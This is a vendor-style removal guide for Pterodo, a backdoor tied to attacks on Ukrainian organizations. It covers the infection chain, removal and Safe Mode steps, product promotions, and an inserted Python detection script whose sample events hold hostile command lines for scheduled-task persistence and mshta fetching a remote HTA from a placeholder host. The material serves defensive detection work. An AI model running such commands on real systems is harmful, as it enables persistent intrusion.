Pterodo malware (virus) - Free Instructions

Pterodo malware Removal Guide

What is Pterodo malware?

Pterodo is politically motivated malware related to cyberattacks against Ukraine

Pterodo is a dangerous malware strain that targets Ukrainian organizations

Pterodo is a Trojan known in the cybersecurity landscape since at least 2014. The date is significant due to the first Russian attacks against Ukraine and the annexation of Crimea. The malware is tied to a Russian cybercriminal group known as Armageddon (also known as Shuckworm or Gamaredon) and is known to attack a number of Ukrainian organizations.

The main goal of Pterodo malware is to open a backdoor on the affected computers or networks. With the help of this functionality, it can inject secondary payloads; its main purpose remains sensitive data theft that can be used against the country in many ways.

Name: Pterodo/Pteranodon
Type: Trojan, backdoor
Cybercriminal group: Russian cyber-espionage group Armageddon
Distribution: Malicious spam email attachments, infected files
Operation: Malware establishes a backdoor that can be used to deliver secondary payloads. It is ultimately used to gather sensitive company information from various Ukrainian organizations
Removal: Disconnect from the network and perform a full system scan with SpyHunter 5 or Combo Cleaner anti-malware
System fix: After malware removal, Windows crashes, errors, and similar issues can occur due to damaged system files. Employ Fortect or Intego to fix this damage with ease


Like any other high-threat malware strain targeting organizations, Pterodo primarily uses targeted phishing emails to begin the infiltration process. These emails are sent to employees disguised as useful messages from well-known individuals, for example, the managers of the people who end up opening the email. Email spoofing is an established technique that helps the malware break through into various businesses and organizations.

The email attachments are often booby-trapped with macro code, which is executed once the document is opened. Thus, not allowing documents to execute macros would prevent the infiltration of malware. Adequate anti-malware solutions and staff security training can significantly reduce the probability of infections.

Pterodo malware can also be spread using alternative methods, including drive-by downloads, repacked installers, crack tools, insecure RDP[1] connections, and more.


As explained by Symantec security researchers,[2] the attack on the system begins with the execution of a malicious VBS file (a backdoor component of Pterodo malware), which is used to download malicious files from a predetermined URL. Upon entry, the malware creates a scheduled task to ensure persistence. Later, a malicious HTA file is downloaded and executed via mshta.exe, which can execute Microsoft HTML Application files and bypass application control solutions.
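
The chain described above (a document launching a script host, a scheduled task created for persistence, and mshta.exe fetching a remote HTA) can be hunted for in process-creation logs. The following Python example is added here and is not code from Symantec or from this guide; the event field names, rule names and sample events are assumptions constructed for illustration, and the rules are generic behavioural heuristics rather than Pterodo-specific signatures.

```python
import re
from ntpath import basename  # parses Windows paths on any OS

OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
SCRIPT_REF = re.compile(r"(wscript|cscript|mshta)(\.exe)?\b|\.(vbs|vbe|hta)\b", re.I)
REMOTE_URL = re.compile(r"https?://", re.I)
TASK_RUN = re.compile(r"/tr\s+(\"[^\"]*\"|\S+)", re.I)  # schtasks "task run" value


def classify(event):
    """Return the list of rule names that one process-creation event matches."""
    image = basename(event["image"]).lower()
    parent = basename(event["parent"]).lower()
    cmd = event["cmdline"]
    hits = []
    if parent in OFFICE and image in SCRIPT_HOSTS:  # macro starts a script host
        hits.append("office_spawns_script_host")
    if image == "schtasks.exe" and re.search(r"/create\b", cmd, re.I):
        run = TASK_RUN.search(cmd)
        if run and SCRIPT_REF.search(run.group(1)):  # task runs a script
            hits.append("scheduled_task_runs_script")
    if image == "mshta.exe" and REMOTE_URL.search(cmd):  # HTA loaded from a URL
        hits.append("mshta_remote_hta")
    return hits


def hunt(events):
    """Map event index -> matched rules, skipping events with no match."""
    return {i: h for i, e in enumerate(events) if (h := classify(e))}


# Constructed sample events (not taken from a real incident); the paths, task
# names and the example.invalid URL are placeholders.
SAMPLE = [
    {"parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r'wscript.exe "C:\Users\Public\doc.vbs"'},
    {"parent": r"C:\Windows\System32\wscript.exe",
     "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": r'schtasks /create /sc minute /mo 10 /tn "Updater" /tr "wscript.exe C:\Users\Public\doc.vbs" /f'},
    {"parent": r"C:\Windows\System32\wscript.exe",
     "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta.exe http://example.invalid/page.hta"},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": r'schtasks /create /sc daily /tn "Backup" /tr "C:\Tools\backup.exe"'},
]
```

Calling `hunt(SAMPLE)` flags the first three events and leaves the ordinary backup task unflagged; in practice the events would come from Sysmon or Windows Security process-creation logs mapped onto the same three fields.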

The main goal of Pterodo is to steal sensitive data and deliver secondary payloads

After establishing the communication means with a remote C&C server, hackers deliver multiple variants of Pterodo malware. It establishes a VNC client – the main vector of the attack – that can be used for various data gathering, including private company documents with descriptions, account passwords, or other sensitive information.

Pterodo removal steps

Anti-malware solutions are the best means of protection against dangerous malware attacks. However, since the Trojan is known to use living-off-the-land[3] and similar obfuscation techniques, it might be difficult to spot and remove. The first step of malware removal is removing the affected machine from the network. In order to disconnect several computers at the same time, follow these steps:

  • Type in Control Panel in Windows search and press Enter
  • Go to Network and Internet
  • Click Network and Sharing Center
  • On the left, pick Change adapter settings
  • Right-click on your connection (for example, Ethernet), and select Disable
  • Confirm with Yes.

Once the device is disconnected, you should begin a full system scan with SpyHunter 5, Combo Cleaner, Malwarebytes, or another powerful anti-malware software. In some cases, it is better to perform a scan in Safe Mode to ensure that the virus does not tamper with the elimination process. To access it, proceed with the following steps:

Windows 7 / Vista / XP

  1. Click Start > Shutdown > Restart > OK.
  2. When your computer becomes active, start pressing the F8 button (if that does not work, try F2, F12, Del, etc. – it all depends on your motherboard model) multiple times until you see the Advanced Boot Options window.
  3. Select Safe Mode with Networking from the list.

Windows 10 / Windows 8

  1. Right-click on the Start button and select Settings.
  2. Scroll down to pick Update & Security.
  3. On the left side of the window, pick Recovery.
  4. Now scroll down to find the Advanced Startup section.
  5. Click Restart now.
  6. Select Troubleshoot.
  7. Go to Advanced options.
  8. Select Startup Settings.
  9. Click Restart.
  10. Press 5 or click 5) Enable Safe Mode with Networking.

Malware can cause tremendous damage to Windows systems to the point where a full reinstallation could be required. For example, an infection can alter the Windows registry, damage vital boot-up and other sections, delete or corrupt DLL files, etc. Antivirus software can't repair damaged files, and a specialized app should be used instead.

  • Download Fortect or Intego
  • Click on the ReimageRepair.exe
  • If User Account Control (UAC) shows up, select Yes
  • Press Install and wait till the program finishes the installation process
  • The analysis of your machine will begin immediately
  • Once complete, check the results – they will be listed in the Summary
  • You can now click on each of the issues and fix them manually
  • If you see many problems that you find difficult to fix, we recommend you purchase the license and fix them automatically.

By employing this tool, you would not have to worry about future computer issues, as most of them could be fixed quickly by performing a full system scan at any time. Most importantly, you could avoid the tedious process of Windows reinstallation in case things go very wrong due to one reason or another.


How to prevent getting trojans

Choose a proper web browser and improve your safety with a VPN tool

Online spying has gained momentum in recent years, and people are getting more and more interested in how to protect their privacy online. One of the basic means to add a layer of security is to choose the most private and secure web browser. Although web browsers can't grant full privacy protection and security, some of them are much better at sandboxing, HTTPS upgrading, active content blocking, tracking blocking, phishing protection, and similar privacy-oriented features. However, if you want true anonymity, we suggest you employ a powerful Private Internet Access VPN – it can encrypt all the traffic that comes and goes out of your computer, preventing tracking completely.


Lost your files? Use data recovery software

While some files located on any computer are replaceable or useless, others can be extremely valuable. Family photos, work documents, school projects – these are types of files that we don't want to lose. Unfortunately, there are many ways unexpected data loss can occur: power cuts, Blue Screen of Death errors, hardware failures, crypto-malware attacks, or even accidental deletion.

To ensure that all the files remain intact, you should prepare regular data backups. You can choose cloud-based or physical copies you could restore from later in case of a disaster. If your backups were lost as well or you never bothered to prepare any, Data Recovery Pro can be your only hope to retrieve your invaluable files.

About the author
Ugnius Kiguolis
Ugnius Kiguolis - The mastermind
